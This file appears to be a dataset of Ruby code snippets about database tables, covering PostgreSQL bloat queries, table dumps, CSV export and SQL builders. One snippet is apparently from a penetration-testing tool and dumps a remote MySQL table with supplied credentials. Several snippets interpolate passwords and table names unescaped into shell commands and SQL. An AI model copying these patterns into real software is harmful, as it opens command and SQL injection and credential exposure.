"def table_bloat\n data = select(<<-SQL, \"Table Bloat\")\n SELECT tablename AS table_name\n , reltuples::bigint AS rows\n , relpages::bigint AS pages\n , otta\n , ROUND(CASE WHEN otta = 0 OR sml.relpages = 0 OR sml.relpages = otta THEN 0.0\n ELSE sml.relpages / otta::numeric END, 1) AS percent_bloat\n , CASE WHEN relpages < otta THEN 0\n ELSE relpages::bigint - otta END AS wasted_pages\n , CASE WHEN relpages < otta THEN 0\n ELSE (blocksize * (relpages - otta))::bigint END AS wasted_size\n , CASE WHEN relpages < otta THEN 0\n ELSE blocksize * (sml.relpages - otta)::bigint END AS wasted_bytes\n FROM ( SELECT schemaname\n , tablename\n , cc.reltuples\n , cc.relpages\n , blocksize\n , CEIL((cc.reltuples * ((datahdr + pagesize - (CASE WHEN datahdr%pagesize = 0 THEN pagesize\n ELSE datahdr%pagesize END)) + nullhdr2 + 4)) / (blocksize - 20::float)\n ) AS otta\n FROM ( SELECT pagesize\n , blocksize\n , schemaname\n , tablename\n , (datawidth + (hdr + pagesize - (CASE WHEN hdr%pagesize = 0 THEN pagesize\n ELSE hdr%pagesize END)))::numeric\n AS datahdr\n , (maxfracsum * (nullhdr + pagesize - (CASE WHEN nullhdr%pagesize = 0 THEN pagesize\n ELSE nullhdr%pagesize END)))\n AS nullhdr2\n FROM ( SELECT schemaname\n , tablename\n , hdr\n , pagesize\n , blocksize\n , SUM((1 - null_frac) * avg_width) AS datawidth\n , MAX(null_frac) AS maxfracsum\n , hdr + ( SELECT 1 + count(*) / 8\n FROM pg_stats s2\n WHERE null_frac <> 0\n AND s2.schemaname = s.schemaname\n AND s2.tablename = s.tablename\n ) AS nullhdr\n FROM pg_stats s\n , ( SELECT\n ( SELECT current_setting('block_size')::numeric) AS blocksize\n , CASE WHEN SUBSTRING(SPLIT_PART(v, ' ', 2)\n FROM '#\"[0-9]+.[0-9]+#\"%' for '#')\n IN ('8.0','8.1','8.2') THEN 27 ELSE 23 END AS hdr\n , CASE WHEN v ~ 'mingw32' OR v ~ '64-bit' THEN 8\n ELSE 4 END AS pagesize\n FROM ( SELECT version() AS v) AS foo\n ) AS constants\n GROUP BY 1, 2, 3, 4, 5\n ) AS foo\n ) AS rs\n JOIN pg_class cc\n ON cc.relname = rs.tablename\n JOIN pg_namespace nn\n ON cc.relnamespace = nn.oid\n AND nn.nspname = rs.schemaname AND nn.nspname <> 'information_schema'\n ) AS sml\n WHERE schemaname = 'public'\n ORDER BY 1\n SQL\n\n integer_columns = %w(\n otta\n pages\n pagesize\n rows\n wasted_bytes\n wasted_pages\n wasted_size\n )\n\n float_columns = %w(\n percent_bloat\n )\n\n data.each do |datum|\n integer_columns.each { |c| datum[c] = datum[c].to_i }\n float_columns.each { |c| datum[c] = datum[c].to_f }\n end\n\n data.to_a\n end",
"def table; end",
"def table; end",
"def table; end",
"def table; end",
"def dump(io)\n print \"Going through tables.\\n\" if @debug\n @rows_count = 0\n \n if @args[:tables]\n tables = @args[:tables]\n else\n tables = @args[:db].tables.list.values\n end\n \n if @on_status\n @on_status.call(:text => \"Preparing.\")\n \n @rows_count_total = 0\n tables.each do |table_obj|\n @rows_count_total += table_obj.rows_count\n end\n end\n \n tables.each do |table_obj|\n table_obj = @args[:db].tables[table_obj] if table_obj.is_a?(String) or table_obj.is_a?(Symbol)\n \n #Figure out keys.\n @keys = []\n table_obj.columns do |col|\n @keys << col.name\n end\n \n @table_obj = table_obj\n self.update_status\n print \"Dumping table: '#{table_obj.name}'.\\n\" if @debug\n self.dump_table(io, table_obj)\n end\n end",
"def paginated_dump( &encode_block )\n records_count = 0\n table_dataset.order(*primary_keys).each_page(page_size) do |page|\n logger.info \"#{__method__} #{table_name} #{records_count}\"\n logger.debug page.sql\n page.each &encode_block\n records_count += page_size\n end\n end",
"def print_stats_table()\n res = @db.query(\"SELECT * FROM UserStats;\")\n while row = res.fetch_row do\n printf \"%s %s\\n\", row[0], row[1], row[2], row[3]\n end\n end",
"def all_records(table_name)\n @connection.execute(\"Select #{columns_minus_geom(table_name).collect { |c| \"\\\"#{c}\\\"\" }.join(\", \")} from #{table_name}\")\n end",
"def show_table\n DATABASE.execute(\"SELECT * FROM split_checks;\")\nend",
"def tabulate2 content, options\n widths = calculate_column_widths(content, 99)\n str = \"| \"\n sep = \"+\"\n widths.each do |w|\n str << \"%-#{w}s | \"\n sep << (\"-\"*(w+2)) + \"+\"\n end\n data = []\n data << sep \n content.each_with_index {|line, ix| \n data << str % line \n data << sep if ix == 0\n }\n data << sep\n require 'tempfile'\n tmpfile = Tempfile.new('SQL.XXXXXX')\n filename = tmpfile.path\n #filename = Shellwords.escape(filename)\n #puts \"Writing to #{filename}\"\n tmpfile.write(data.join(\"\\n\"))\n tmpfile.close # need to flush, otherwise write is buffered\n return filename\nend",
"def inner_dump( &encode_block )\n # could possibly overrride Dataset#paginate(page_no, page_size, record_count=nil)\n on_conditions = primary_keys.map{|f| [f,f]}.to_h\n (0..table_dataset.count).step(page_size).each do |offset|\n limit_dataset = table_dataset.select( *primary_keys ).limit( page_size, offset ).order( *primary_keys )\n page = table_dataset.join( limit_dataset, on_conditions ).order( *primary_keys ).qualify(table_name)\n logger.info \"#{__method__} #{table_name} #{offset}\"\n logger.debug page.sql\n page.each &encode_block\n end\n end",
"def create_rows_and_query(number_rows, number_query, str_length)\n File.open(\"../benchmark/benchmark_#{number_query}_queries.sql\", 'a+') do |file|\n CSV.open(\"./#{number_rows}_rows_data.csv\", 'a+') do |csv|\n number_rows.times do |time|\n random_str1 = random_str(str_length)\n csv << [time + 1, random_str1]\n file.write(\"select * from test_data where random_str = '#{random_str1}';\") if time < number_query\n end\n end\n end\n puts \"CREATE #{number_rows} ROWS DONE\"\nend",
"def insert_data(output, db, table)\n result = query(db, \"SELECT * FROM #{table}\", \"hash\")\n changes = false\n result.each do |row|\n to_insert(output, table, row)\n changes = true\n end\n output << \"\\n\" if changes\n end",
"def direct_export(file_name, sql = nil, col_sep = \"\\t\")\n sql = self.select(column_names).to_sql if sql.blank?\n data = streaming_query(sql)\n return 0 if data.nil?\n\n write_to_csv(file_name, data, col_sep) {|rec| rec.values }\n end",
"def run\n tables.each do |table|\n dump_table(table)\n end\n end",
"def esc_table(str)\r\n self.conn_exec do |driver|\r\n return driver.esc_table(str)\r\n end\r\n end",
"def print_table_names\r\n get_tables.each do |name| \r\n print \"#{name} \"\r\n end\r\n puts \"\"\r\n end",
"def format table, keys, values\n <<-SQL\nCOPY #{table} (#{keys.join(', ')}) FROM stdin;\n#{values.collect { |row| row.join \"\\t\" }.join \"\\n\"}\n\\\\.\n SQL\n end",
"def table_options_sql(options)\n\t sql = []\n\t sql << flag_option_sql(options, :parallel)\n\t sql << flag_option_sql(options, :logging)\n\t sql << flag_option_sql(options, :monitoring)\n\t sql << \"TABLESPACE #{quote_identifier(options[:tablespace])}\" if options[:tablespace]\n\t sql << compress_option_sql(options)\n\t sql << options[:options] if String === options[:options]\n\t sql.compact.join ' '\n\t end",
"def log_query(sql)\n pad = ' '\n puts Paint[pad + sql, :cyan, :bold]\n # @loggers[0]&.debug(' ' + sql)\n end",
"def report_table(output, sort, options = {}, &block)\n output.puts\n\n top_categories = output.slice_results(sorted_by(sort))\n output.with_style(:top_line => true) do \n output.table(*statistics_header(:title => options[:title],:highlight => sort)) do |rows|\n top_categories.each { |(cat, info)| rows.push(statistics_row(cat)) }\n end\n end\n output.puts\n end",
"def dump_table(db, tbl, num)\n t = Time.now\n timez = t.strftime(\"%m.%d.%Y\")\n logs = RESULTS + @host\n logdir = logs + '/dumps/'\n Dir.mkdir(logs) unless File.exists?(logs)\n Dir.mkdir(logdir) unless File.exists?(logdir)\n print_status(\"Attempting to dump #{db}.#{tbl}....\")\n if num.to_i == 1\n system(\"`which mysqldump` --host=#{@host} --user=#{@user} --password=#{@pass} #{db} #{tbl} --add-locks --create-options --disable-keys --extended-insert --lock-tables --quick -C --dump-date | gzip -c > #{logdir}#{db}_#{tbl}_#{timez}.sql.gz\")\n print_good(\"Table Dump Complete!\")\n print_good(\"You can view it here: #{logdir}#{db}_#{tbl}_#{timez}.sql.gz\")\n else\n system(\"`which mysqldump` --host=#{@host} --user=#{@user} --password=#{@pass} #{db} #{tbl} --add-locks --create-options --disable-keys --extended-insert --lock-tables --quick -C --dump-date > #{logdir}#{db}_#{tbl}_#{timez}.sql\")\n print_good(\"Table Dump Complete!\")\n print_good(\"You can view it here: #{logdir}#{db}_#{tbl}_#{timez}.sql\")\n end\n end",
"def table(header, values, io = $stdout)\n self.puts(io, MiGA.tabulate(header, values, self[:tabular]))\n end",
"def _dump_tables(opts)\n if opts[:schema]\n _literal_table_sort(tables(opts.merge(:qualify=>true)))\n else\n tables(opts).sort\n end\n end",
"def write_sql model_name, model_attributes,output\n model_attributes.each do|key,query|\n sql= ActiveRecord::Base.connection();\n (sql.select_all query).each do |row|\n make_triples(row,model_name,\"\")\n end\n end\n end",
"def display_students_db\n all_students = @conn.exec(\"SELECT * FROM students_db;\")\n #usp[e exec to pretty much do everything\n all_students.each do |student|\n student.each do |k,v|\n puts \"#{k}: #{v}\"\n puts all_students\n end\n end\nend",
"def create_table_sql(name, generator, options)\n a, b = super(name, generator, options), table_options_sql(options)\n \"#{a}\\n#{b}\"\n\t end",
"def dump(io)\n debug \"Going through tables.\"\n @rows_count = 0\n\n if @on_status\n @on_status.call(text: \"Preparing.\")\n\n @rows_count_total = 0\n tables.each do |table_obj|\n @rows_count_total += table_obj.rows_count\n end\n end\n\n each_table do |table_obj|\n # Figure out keys.\n @keys = []\n table_obj.columns do |col|\n @keys << col.name\n end\n\n @table_obj = table_obj\n update_status\n debug \"Dumping table: '#{table_obj.name}'.\"\n dump_table(io, table_obj)\n end\n\n dump_foreign_keys(io)\n end",
"def output_table(title = '', headings, rows)\n table = Terminal::Table.new\n table.title = title unless title.empty?\n table.rows = rows\n table.headings = headings\n table.style = {\n :padding_left => 1,\n :padding_right => 1\n }\n\n puts table\n end",
"def run_sql(limit: 100, cmds: $sql_commands, print: true, label: 'SELECT Results', collapsed: false, &block)\n Display.status(\"Running sql commands...\")\n cmds = [cmds] if cmds.is_a? String\n results = cmds.map do |cmd|\n dataset = run_cmd(cmd) || []\n if dataset.count > 0\n\n lbl = label\n lbl += \" (Top #{limit} of #{dataset.count})\" if dataset.count > limit\n lbl = \"-\" + lbl if collapsed\n\n block.call(dataset, lbl) if block\n\n Display.table(dataset.to_a.take(limit), label: lbl, allow_preview: true) if print\n end\n dataset\n end\n\n results.select! {|r| r.count > 0 }\n\n if results.length > 1\n $sql_multi = true\n $sql_results = results\n else\n $sql_multi = false\n $sql_results = results.first || []\n end\n\nrescue Sequel::DatabaseError => ex\n msg = ex.message.gsub(\"SQLite3::SQLException: \", \"\");\n puts Display.print(\"ERROR\", \"There was an error with the SQL query:\\n\\n#{msg.strip}\")\n []\nend",
"def inspect\n to_table.render :ascii\n end",
"def create_table(output, db, table)\n cols = query(db, \"DESCRIBE #{table}\")\n \n output << \"CREATE TABLE #{table} (\\n\"\n cols.each_with_index do |c, i|\n output << \",\\n\" if i > 0\n output << \"\\t#{c[0]} #{c[1]}\"\n output << \" primary key\" if c[3] == \"PRI\"\n output << \" DEFAULT NULL\" if c[2] == \"YES\"\n output << \" DEFAULT #{c[4]}\" if c[2] == \"NO\" && c[3] != \"PRI\"\n output << \" #{c[5]}\" if c[5] != \"\"\n end\n output << \"\\n);\\n\\n\"\n\n return cols\n end",
"def copy_into_sql(table, opts)\n sql = String.new\n sql << \"COPY #{literal(table)}\"\n if cols = opts[:columns]\n sql << literal(Array(cols))\n end\n sql << \" FROM STDIN\"\n if opts[:options] || opts[:format]\n sql << \" (\"\n sql << \"FORMAT #{opts[:format]}\" if opts[:format]\n sql << \"#{', ' if opts[:format]}#{opts[:options]}\" if opts[:options]\n sql << ')'\n end\n sql\n end",
"def dump_table(table)\n conditions = conditions_for(table)\n\n cmd = \"mysqldump #{ mysql_options } --tables #{ table }\"\n cmd += \" \\\"--where=#{ conditions }\\\"\" if conditions.present?\n\n if post_dump_command\n cmd += \"| #{post_dump_command}\"\n end\n\n cmd += \" > #{ output_dir }/#{ table }#{file_extension}\"\n\n system(cmd)\n end",
"def table_close(opts)\n output = \"\\\\begin{table}\\n\"\n output << \" \\\\centering\\n\"\n output << \" \\\\begin{tabular}{ #{\"l \" * @table[0].size }}\\n\"\n @table.each do |row|\n output << \" #{row.join(\" & \")} \\\\\\\\\\n\"\n end\n output << \" \\\\end{tabular}\\n\"\n output << \"\\\\end{table}\\n\"\n output\n end",
"def to_sql\n source.select(bin_sql).to_sql\n end",
"def database_bloat\n data = select(<<-SQL, \"Database Bloat\")\n SELECT tablename AS table_name\n , ' ' AS index_name\n , reltuples::bigint AS rows\n , relpages::bigint AS pages\n , otta\n , ROUND(CASE WHEN otta = 0 OR sml.relpages = 0 OR sml.relpages = otta THEN 0.0 ELSE sml.relpages / otta::numeric END, 1) AS percent_bloat\n , CASE WHEN relpages < otta THEN 0 ELSE relpages::bigint - otta END AS wasted_pages\n , CASE WHEN relpages < otta THEN 0 ELSE (blocksize * (relpages - otta))::bigint END AS wasted_size\n , CASE WHEN relpages < otta THEN 0 ELSE blocksize * (sml.relpages - otta)::bigint END AS wasted_bytes\n FROM ( SELECT schemaname\n , tablename\n , cc.reltuples\n , cc.relpages\n , blocksize\n , CEIL((cc.reltuples * ((datahdr + pagesize - (CASE WHEN datahdr % pagesize = 0 THEN pagesize\n ELSE datahdr % pagesize END)) + nullhdr2 + 4)) / (blocksize - 20::float)\n ) AS otta\n FROM ( SELECT pagesize\n , blocksize\n , schemaname\n , tablename\n , (datawidth + (hdr + pagesize - (CASE WHEN hdr%pagesize = 0 THEN pagesize\n ELSE hdr%pagesize END)))::numeric AS datahdr\n , (maxfracsum * (nullhdr + pagesize - (CASE WHEN nullhdr % pagesize = 0 THEN pagesize\n ELSE nullhdr % pagesize END))) AS nullhdr2\n FROM ( SELECT schemaname\n , tablename\n , hdr\n , pagesize\n , blocksize\n , SUM((1 - null_frac) * avg_width) AS datawidth\n , MAX(null_frac) AS maxfracsum\n , hdr + ( SELECT 1 + count(*) / 8\n FROM pg_stats s2\n WHERE null_frac <> 0\n AND s2.schemaname = s.schemaname\n AND s2.tablename = s.tablename\n ) AS nullhdr\n FROM pg_stats s\n , ( SELECT\n ( SELECT current_setting('block_size')::numeric) AS blocksize\n , CASE WHEN SUBSTRING(SPLIT_PART(v, ' ', 2) FROM '#\"[0-9]+.[0-9]+#\"%' for '#')\n IN ('8.0','8.1','8.2') THEN 27 ELSE 23 END AS hdr\n , CASE WHEN v ~ 'mingw32' OR v ~ '64-bit' THEN 8 ELSE 4 END AS pagesize\n FROM ( SELECT version() AS v) AS foo\n ) AS constants\n GROUP BY 1, 2, 3, 4, 5\n ) AS foo\n ) AS rs\n JOIN pg_class cc\n ON cc.relname = rs.tablename\n JOIN pg_namespace nn\n ON cc.relnamespace = nn.oid\n AND nn.nspname = rs.schemaname\n AND nn.nspname <> 'information_schema'\n ) AS sml\n WHERE schemaname = 'public'\n\n UNION\n\n SELECT tablename AS table_name\n , iname AS index_name\n , ituples::bigint AS rows\n , ipages::bigint AS pages\n , iotta AS otta\n , ROUND(CASE WHEN iotta = 0 OR ipages = 0 OR ipages = iotta THEN 0.0 ELSE ipages / iotta::numeric END, 1) AS percent_bloat\n , CASE WHEN ipages < iotta THEN 0 ELSE ipages::bigint - iotta END AS wasted_pages\n , CASE WHEN ipages < iotta THEN 0 ELSE (blocksize * (ipages - iotta))::bigint END AS wasted_size\n , CASE WHEN ipages < iotta THEN 0 ELSE blocksize * (ipages - iotta) END AS wasted_bytes\n\n FROM ( SELECT schemaname\n , tablename\n , cc.reltuples\n , cc.relpages\n , blocksize\n , CEIL((cc.reltuples * ((datahdr + pagesize - (CASE WHEN datahdr % pagesize = 0 THEN pagesize\n ELSE datahdr % pagesize END)) + nullhdr2 + 4)) / (blocksize - 20::float)\n ) AS otta\n , COALESCE(c2.relname,'?') AS iname, COALESCE(c2.reltuples, 0) AS ituples, COALESCE(c2.relpages, 0) AS ipages\n , COALESCE(CEIL((c2.reltuples * (datahdr - 12)) / (blocksize - 20::float)), 0) AS iotta\n FROM ( SELECT pagesize\n , blocksize\n , schemaname\n , tablename\n , (datawidth + (hdr + pagesize - ( CASE WHEN hdr%pagesize = 0 THEN pagesize\n ELSE hdr%pagesize END)))::numeric AS datahdr\n , (maxfracsum * (nullhdr + pagesize - ( CASE WHEN nullhdr % pagesize = 0 THEN pagesize\n ELSE nullhdr % pagesize END))) AS nullhdr2\n FROM ( SELECT schemaname\n , tablename\n , hdr\n , pagesize\n , blocksize\n , SUM((1 - null_frac) * avg_width) AS datawidth\n , MAX(null_frac) AS maxfracsum\n , hdr + ( SELECT 1 + count(*) / 8\n FROM pg_stats s2\n WHERE null_frac <> 0\n AND s2.schemaname = s.schemaname\n AND s2.tablename = s.tablename\n ) AS nullhdr\n FROM pg_stats s\n , ( SELECT\n ( SELECT current_setting('block_size')::numeric) AS blocksize\n , CASE WHEN SUBSTRING(SPLIT_PART(v, ' ', 2) FROM '#\"[0-9]+.[0-9]+#\"%' for '#')\n IN ('8.0','8.1','8.2') THEN 27 ELSE 23 END AS hdr\n , CASE WHEN v ~ 'mingw32' OR v ~ '64-bit' THEN 8 ELSE 4 END AS pagesize\n FROM ( SELECT version() AS v) AS foo\n ) AS constants\n GROUP BY 1, 2, 3, 4, 5\n ) AS foo\n ) AS rs\n JOIN pg_class cc\n ON cc.relname = rs.tablename\n JOIN pg_namespace nn\n ON cc.relnamespace = nn.oid\n AND nn.nspname = rs.schemaname\n AND nn.nspname <> 'information_schema'\n LEFT JOIN pg_index i\n ON indrelid = cc.oid\n LEFT JOIN pg_class c2\n ON c2.oid = i.indexrelid\n ) AS sml\n WHERE schemaname = 'public'\n ORDER BY 1, 2\n SQL\n\n integer_columns = %w(\n otta\n pages\n pagesize\n rows\n wasted_bytes\n wasted_pages\n wasted_size\n )\n\n float_columns = %w(\n percent_bloat\n )\n\n data.each do |datum|\n integer_columns.each { |c| datum[c] = datum[c].to_i }\n float_columns.each { |c| datum[c] = datum[c].to_f }\n end\n\n data.to_a\n end",
"def print_list(db, table_name)\n\tputs \"Your current to do list:\"\n\ttasks = db.execute(\"SELECT * FROM #{table_name}\")\n\ttasks.each do |task|\n\t\tputs \"Task: #{task['id']} is #{task['task_name']} and will take #{task['task_time']} hours. It is #{task['importance']}/10 important.\"\n\t\tputs\n\tend\nend",
"def dump(vt, to: $stderr)\n to.puts \" .\" + ('-' * (vt.cols)) + \".\"\n (1 .. vt.rows).each do |row|\n to.puts \" |#{vt.row_plaintext(row)}|\"\n end\n to.puts \" '\" + ('-' * (vt.cols)) + \"'\"\nend",
"def index_bloat\n data = select(<<-SQL, \"Index Bloat\")\n SELECT tablename AS table_name\n , iname AS index_name\n , ituples::bigint AS rows\n , ipages::bigint AS pages\n , iotta AS otta\n , ROUND(CASE WHEN iotta = 0 OR ipages = 0 OR ipages = iotta THEN 0.0 ELSE ipages / iotta::numeric END, 1) AS percent_bloat\n , CASE WHEN ipages < iotta THEN 0 ELSE ipages::bigint - iotta END AS wasted_pages\n , CASE WHEN ipages < iotta THEN 0 ELSE (blocksize * (ipages - iotta))::bigint END AS wasted_size\n , CASE WHEN ipages < iotta THEN 0 ELSE blocksize * (ipages - iotta) END AS wasted_bytes\n\n FROM ( SELECT schemaname\n , tablename\n , cc.reltuples\n , cc.relpages\n , blocksize\n , CEIL((cc.reltuples * ((datahdr + pagesize - (CASE WHEN datahdr%pagesize = 0 THEN pagesize\n ELSE datahdr%pagesize END)) + nullhdr2 + 4)) / (blocksize - 20::float)\n ) AS otta\n , COALESCE(c2.relname,'?') AS iname, COALESCE(c2.reltuples, 0) AS ituples, COALESCE(c2.relpages, 0) AS ipages\n , COALESCE(CEIL((c2.reltuples * (datahdr - 12)) / (blocksize - 20::float)), 0) AS iotta\n FROM ( SELECT pagesize\n , blocksize\n , schemaname\n , tablename\n , (datawidth + (hdr + pagesize - (case when hdr%pagesize = 0 THEN pagesize ELSE hdr%pagesize END)))::numeric AS datahdr\n , (maxfracsum * (nullhdr + pagesize - (case when nullhdr%pagesize = 0 THEN pagesize ELSE nullhdr%pagesize END))) AS nullhdr2\n FROM ( SELECT schemaname\n , tablename\n , hdr\n , pagesize\n , blocksize\n , SUM((1 - null_frac) * avg_width) AS datawidth\n , MAX(null_frac) AS maxfracsum\n , hdr + ( SELECT 1 + count(*) / 8\n FROM pg_stats s2\n WHERE null_frac <> 0\n AND s2.schemaname = s.schemaname\n AND s2.tablename = s.tablename\n ) AS nullhdr\n FROM pg_stats s\n , ( SELECT\n (SELECT current_setting('block_size')::numeric) AS blocksize\n , CASE WHEN SUBSTRING(SPLIT_PART(v, ' ', 2) FROM '#\"[0-9]+.[0-9]+#\"%' for '#')\n IN ('8.0','8.1','8.2') THEN 27 ELSE 23 END AS hdr\n , CASE WHEN v ~ 'mingw32' OR v ~ '64-bit' THEN 8 ELSE 4 END AS pagesize\n FROM (SELECT version() AS v) AS foo\n ) AS constants\n GROUP BY 1, 2, 3, 4, 5\n ) AS foo\n ) AS rs\n JOIN pg_class cc\n ON cc.relname = rs.tablename\n JOIN pg_namespace nn\n ON cc.relnamespace = nn.oid\n AND nn.nspname = rs.schemaname AND nn.nspname <> 'information_schema'\n LEFT JOIN pg_index i\n ON indrelid = cc.oid\n LEFT JOIN pg_class c2\n ON c2.oid = i.indexrelid\n ) AS sml\n WHERE schemaname = 'public'\n ORDER BY 1, 2\n SQL\n\n integer_columns = %w(\n otta\n pages\n pagesize\n rows\n wasted_bytes\n wasted_pages\n wasted_size\n )\n\n float_columns = %w(\n percent_bloat\n )\n\n data.each do |datum|\n integer_columns.each { |c| datum[c] = datum[c].to_i }\n float_columns.each { |c| datum[c] = datum[c].to_f }\n end\n\n data.to_a\n end",
"def table\n end",
"def emit record\n puts record.to_flat.join(\"\\t\")\n end",
"def generate_index tab_name, argv\n\t\tquery = \" CREATE INDEX #{argv[argv.keys[0]]} ON #{tab_name} (#{argv[argv.keys[1]]}) \"\n\t\tputs query\n\t\treturn query\n\tend",
"def dumpCsvSpeed()\n CSV.open(csvFilenameSpeed(), \"w\", { :col_sep => csvColSepChar() }) { |csv|\n csv << AnalyzerExpA.genCsvTitleRow() ;\n genCsvSpeed().each{|row|\n csv << row ;\n }\n }\n end",
"def table_open(opts)\n @table = []\n @table_multirow = {}\n @table_multirow_next = {}\n return \"\"\n end",
"def dump_insert_multi(io, table_obj, rows)\n print \"Inserting #{rows.length} into #{table_obj.name}.\\n\" if @debug\n sqls = @args[:db].insert_multi(table_obj.name, rows, :return_sql => true, :keys => @keys)\n sqls.each do |sql|\n io.write(\"#{sql};\\n\")\n end\n \n rows.clear\n \n #Ensure garbage collection or we might start using A LOT of memory.\n GC.start\n end",
"def exec_query(query, conn = ActiveRecord::Base.connection)\n res = conn.exec_query(query)\n puts res.rows.map { |r| r.map(&:inspect).join(\",\") }.join('\\n')\n res.to_a\nend",
"def pp_table(headers, rows)\n if headers.empty? || rows.empty?\n return\n end\n puts headers.map { |h| \"%20s\" % h.upcase }.join\n rows.map { |cols| puts cols.map { |c| \"%20s\" % c }.join }\n #puts \"=\" * 80\nend",
"def emit(s, out: $output)\n out.print(TAB, s)\nend",
"def emit(s, out: $output)\n out.print(TAB, s)\nend",
"def emit(s, out: $output)\n out.print(TAB, s)\nend",
"def dumptable\n print <<-TABLEDATA.unindent\n <table>\n <tr><td>userid</td><td>#{@user_id}</td></tr>\n <tr><td>username</td><td>#{@user_name}</td></tr>\n <tr><td>useremail</td><td>#{@user_email}</td></tr>\n <tr><td>visitcount</td><td>#{@visitcount}</td></tr>\n <tr><td>admin</td><td>#{@admin}</td></tr>\n </table>\n TABLEDATA\n end",
"def create_stats_tbl\n tblName = \"#{@table}_stat\"\n creationQuery = \"select ''::text as key, ''::text as value from t_result where 1 =2\"\n # puts creationQuery\n DBConn.tblCreation(tblName, 'key', creationQuery)\n\n parseTree = @parseTree\n\n # fromPT = parseTree['SELECT']['fromClause']\n originalTargeList = parseTree['SELECT']['targetList']\n # fields = DBConn.getAllRelFieldList(fromPT)\n keyList = []\n valueList = []\n selectList = []\n pkJoinList = []\n \n pkArray = @pkList.split(',').map { |col| col.delete(' ') }\n pkArray.each do |pkcol|\n originalTargeList.each do |targetCol|\n targetField = targetCol['RESTARGET']['val']['COLUMNREF']['fields']\n if targetField.count > 1 && targetField[1].to_s == pkcol\n pkJoinList << \"t.#{pkcol} = #{targetField[0]}.#{targetField[1]}\"\n pkArray.delete(pkcol)\n end\n end\n end\n\n stats = {\n \"min\": {\"func\": \"min($COLUMN)\", \"type\": \"text\" },\n \"max\": {\"func\": \"max($COLUMN)\", \"type\": \"text\" },\n \"count\": {\"func\": \"count($COLUMN)\", \"type\": \"int\" },\n \"dist_count\": {\"func\": \"count(distinct $COLUMN)\", \"type\": \"int\" }\n }\n @all_cols.each do |field|\n # puts field.colname\n rel_alias = field.relalias\n stats.each do |stat, info|\n # SELECT\n # UNNEST(ARRAY['address_id_max','address_id_min']) AS key,\n # UNNEST(ARRAY[max(address_id),min(address_id)]) AS value\n # FROM address\n # only add N(umeric) and D(ate) type fields\n if %w(N D).include? field.typcategory\n keyList << \"'#{field.relname}_#{field.colname}_#{stat}'\"\n value = info[:func].gsub('$COLUMN',\"result.#{field.relname}_#{field.colname}\")\n # if info[:type] == 'text'\n value = \"#{value}::text\"\n # end\n valueList << value\n # valueList << \"#{stat}(result.#{field.relname}_#{field.colname})::text\"\n end\n end\n selectList << \"#{rel_alias}.#{field.colname} as #{field.relname}_#{field.colname} \"\n\n # construnct pk join cond\n if pkArray.include?(field.colname)\n pkJoinList << \"#{@table}.#{field.colname} = #{rel_alias}.#{field.colname}\"\n end\n end\n\n # # remove the where clause in query and replace targetList\n whereClauseReplacement = []\n selectQuery = ReverseParseTree.reverseAndreplace(parseTree, selectList.join(','), whereClauseReplacement)\n resultQuery = %(with result as (#{selectQuery} join #{@table} on #{pkJoinList.join(' AND ')}))\n newTargetList = \"UNNEST(ARRAY[#{keyList.join(',')}]) AS key, UNNEST(ARRAY[#{valueList.join(',')}]) as value\"\n\n newQuery = %(#{resultQuery} SELECT #{newTargetList} FROM result)\n query = %(INSERT INTO #{tblName} #{newQuery})\n # puts query\n DBConn.exec(query)\n end",
"def generate_query\n unless databases.nil?\n databases.each do |db|\n create_query[db] = [\"create table #{tablename} (\"]\n end\n csv_column_datatypes.each do |header, datatype|\n append_to_query = build_query_for_datatype(header, datatype)\n append_to_query.each do |key, value|\n create_query[key].push(value)\n end\n end\n prepare_sql_statements\n prepare_import_csv\n # Pass the prepared statements to options varaible.\n # Which gets passed on to print_metadata_analysis\n options[:create_query] = create_query\n options[:import_query] = import_query\n end\n print_metadata_analysis\n end",
"def dump_insert_multi(io, table_obj, rows)\n debug \"Inserting #{rows.length} into #{table_obj.name}.\"\n sqls = @export_db.insert_multi(\n table_obj.name,\n rows,\n replace_line_breaks: true,\n return_sql: true,\n keys: @keys\n )\n sqls.each do |sql|\n io.write(\"#{sql};\\n\")\n end\n\n rows.clear\n\n # Ensure garbage collection or we might start using A LOT of memory.\n GC.start\n end",
"def select_table_options_sql(sql)\n sql << \" WITH #{@opts[:table_options]}\" if @opts[:table_options]\n end",
"def simple_table(hash, opts = {})\n SimpleTable.new(hash, opts).to_s\n end",
"def _table; @table end",
"def export_table_data(table, min_id=false, max_id=false)\n unless min_id && max_id && table.chunks > 0\n output \"Exporting all data\", table\n rows_exported = query(table.sql_export_all)\n output \"#{rows_exported} rows exported\", table\n return rows_exported\n end\n \n output \"Exporting data for ID range #{min_id}..#{max_id}\", table\n lock = Mutex.new\n rows_exported = 0\n chunks_completed = 0\n \n (min_id..max_id).in_chunks(table.chunks) do |min, max|\n attempts = 0\n begin\n sql = table.sql_export_range(min, max)\n result = query sql\n lock.synchronize do\n rows_exported += result\n chunks_completed += 1\n percent_finished = 100 * chunks_completed / table.chunks\n output(\"Export #{percent_finished}% complete.\", table) if table.chunks >= 40 && chunks_completed % 20 == 0\n end\n rescue => ex\n if attempts >= 10\n output \"EXPORT ERROR: #{ex.message}, chunk #{min}-#{max}, giving up\", table\n raise\n end\n attempts += 1\n output \"EXPORT ERROR: #{ex.message}, chunk #{min}-#{max}, attempt #{attempts}, re-trying after delay\", table\n ssh_cmd(\"rm -f \" + table.export_file_path(min, max))\n sleep(1.0 * attempts)\n retry\n end\n end\n output \"#{rows_exported} rows exported\", table\n rows_exported\n end",
"def drawToSTDOUT\n for r in (0..6).step(3) do\n print \"+-----++-----++-----+\\n\"\n print \"| \\\\\"+@table[r].getTop.to_s+\"/ || \\\\\"+@table[r+1].getTop.to_s+\"/ || \\\\\"+@table[r+2].getTop.to_s+\"/ |\\n\"\n print \"|\"+@table[r].getLeft.to_s+\" × \"+@table[r+1].getRight.to_s+\"||\"+@table[r+2].getLeft.to_s+\" × \"+@table[r].getRight.to_s+\"||\"+@table[r+1].getLeft.to_s+\" × \"+@table[r+2].getRight.to_s+\"|\\n\"\n print \"| /\"+@table[r].getBottom.to_s+\"\\\\ || /\"+@table[r+1].getBottom.to_s+\"\\\\ || /\"+@table[r+2].getBottom.to_s+\"\\\\ |\\n\"\n print \"+-----++-----++-----+\\n\"\n end\n end",
"def display_food_log(db)\n food_data = db.execute(\"SELECT * FROM food_log\")\n food_data.each do |macros|\n puts \"On #{macros['date']} you ate #{macros['total_calories']} calories, #{macros['total_fat']} grams of fat, #{macros['total_carbs']} #{macros['total_carbs']} grams of carbohydrates, and #{macros['total_protein']} grams of protein.\"\n end\n\nend",
